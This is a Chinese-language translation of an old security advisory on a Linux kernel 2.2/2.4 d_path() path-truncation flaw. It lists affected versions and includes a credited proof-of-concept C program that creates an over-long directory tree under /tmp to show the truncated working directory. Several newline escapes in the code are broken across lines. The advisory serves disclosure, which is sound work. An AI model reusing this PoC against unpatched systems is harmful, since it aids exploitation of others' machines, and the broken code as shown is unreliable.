Linux Kernel d_path()路径切断漏洞

/ns/ld/unix/data/20020804013457.htm

Linux Kernel d_path()路径切断漏洞

翻译:晓澜 <emile_liao@163.net>
   QQ: 42449970
   http://www.unsecret.org
---------------------------------------------




受影响漏洞:

Linux kernel 2.2
Linux kernel 2.2.1
Linux kernel 2.2.2
Linux kernel 2.2.3
Linux kernel 2.2.4
Linux kernel 2.2.5
Linux kernel 2.2.6
Linux kernel 2.2.7
Linux kernel 2.2.8
Linux kernel 2.2.9
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.11
Linux kernel 2.2.12
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
Linux kernel 2.2.14
+ Caldera eDesktop 2.4
+ Caldera eServer 2.3.1
+ RedHat Linux 6.2
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Linux Mandrake 7.1
Linux kernel 2.2.16
+ RedHat Linux 7.0
Linux kernel 2.2.17
+ MandrakeSoft Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.18
+ Wirex Immunix OS 6.2
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7.0-Beta
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
+ MandrakeSoft Linux Mandrake 8.1
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.20
Linux kernel 2.3
Linux kernel 2.3.99
Linux kernel 2.4
Linux kernel 2.4.1
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
Linux kernel 2.4.3
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
Linux kernel 2.4.4
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.6
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.8
+ MandrakeSoft Linux Mandrake 8.1
Linux kernel 2.4.9
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 ia64
Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.11
Linux kernel 2.4.12
Linux kernel 2.4.13
Linux kernel 2.4.14
Linux kernel 2.4.15
Linux kernel 2.4.16
Linux kernel 2.4.17
Linux kernel 2.4.18

漏洞描述:

Linux kernel的d_path()函数用绝对路径访问指定文件时会返回一个固定长度为PAGE_SIZE的缓冲值。一般
来说出错时会有错误信息返回,但是如果返回一个超长的缓冲,则会导致不出现错误信息。

利用方法:
以下代码由Wojciech Purczynski <cliph@isec.pl>提供

/*
* 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
*
* Bug found by cliph
*/

#include <unistd.h>
#include <stdio.h>
#include <limits.h>
#include <errno.h>
#include <paths.h>

/*
* Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for
* trailing '0'
*/

#define PATH_COMPONENT "123456789abcdef"

void err(char * msg)
{
if (errno) {
perror(msg);
exit(1);
}
}

int main()
{
char buf[PATH_MAX + 1]; /* think of trailing '0' */
int len;

errno = 0;

chdir(_PATH_TMP);
err("chdir");

/* show CWD before exploiting the bug */
getcwd(buf, sizeof(buf));
err("getcwd #1");
fprintf(stderr, "CWD=%.40s
", buf);

/* creating long directory tree - it must exceed PATH_MAX characters */
for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) {
errno = 0;
mkdir(PATH_COMPONENT, 0700);
if (errno != EEXIST)
err("mkdir");
errno = 0;
chdir(PATH_COMPONENT);
err("mkdir");
}

/* show CWD before exploiting the bug */
getcwd(buf, sizeof(buf));
err("getcwd #1");
fprintf(stderr, "CWD=%.40s... [stripped]
", buf);

return 0;
}

参考:
http://online.securityfocus.com/archive/1/264117